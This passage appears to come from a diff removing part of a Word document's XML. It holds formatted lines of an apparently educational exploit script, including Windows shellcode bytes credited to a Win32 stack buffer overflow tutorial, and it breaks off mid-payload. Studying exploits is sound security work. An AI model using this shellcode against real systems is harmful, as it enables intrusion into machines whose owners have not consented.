-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "###################################"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t># Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
